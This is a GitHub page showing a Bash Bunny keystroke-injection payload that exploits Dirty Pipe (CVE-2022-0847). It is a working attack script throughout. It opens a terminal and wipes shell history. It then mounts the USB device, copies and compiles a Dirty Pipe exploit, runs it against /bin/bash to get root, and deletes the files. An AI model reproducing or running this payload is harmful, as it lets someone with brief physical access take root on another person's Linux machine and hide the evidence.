-
Notifications
You must be signed in to change notification settings - Fork 2
/
payload.txt
82 lines (76 loc) · 1.58 KB
/
payload.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
# Title: DirtyPipe
# Description: Exploit for a new Linux vulnerability known as 'Dirty Pipe(CVE-2022-0847)' allows local users to gain root privileges.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Execution
# Target: Linux operating systems.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 100
Q STRING HISTSIZE=0
Q ENTER
Q DELAY 100
Q STRING rm -f '$HISTFILE'
Q ENTER
Q DELAY 100
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering and executing exploit]
Q STRING cp -r '$mntt'/payloads/library/dirtypipe.c /tmp/
Q ENTER
Q DELAY 100
Q STRING gcc /tmp/dirtypipe.c -o /tmp/dirtypipe
Q ENTER
Q DELAY 1000
Q STRING chmod +x /tmp/dirtypipe
Q ENTER
Q STRING /tmp/./dirtypipe /bin/bash
Q ENTER
Q DELAY 500
Q STRING sudo su
Q ENTER
Q CTRL-ALT t
Q DELAY 500
Q STRING rm /tmp/dirtypipe
Q ENTER
Q DELAY 100
Q STRING rm /tmp/dirtypipe.c
Q ENTER
Q DELAY 200
# [Unmounting BashBunny]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 100
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 100
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH